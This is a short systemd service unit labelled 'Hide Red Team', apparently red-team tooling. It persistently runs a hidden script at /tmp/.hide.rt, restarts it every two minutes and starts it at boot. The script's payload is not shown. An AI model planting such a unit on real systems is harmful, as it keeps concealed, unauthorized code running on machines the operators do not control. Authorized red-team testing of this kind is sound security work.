[Unit]
Description=Hide Red Team

[Service]
Type=simple
Restart=always
RestartSec=120s
ExecStart=/bin/bash /tmp/.hide.rt

[Install]
WantedBy=multi-user.target
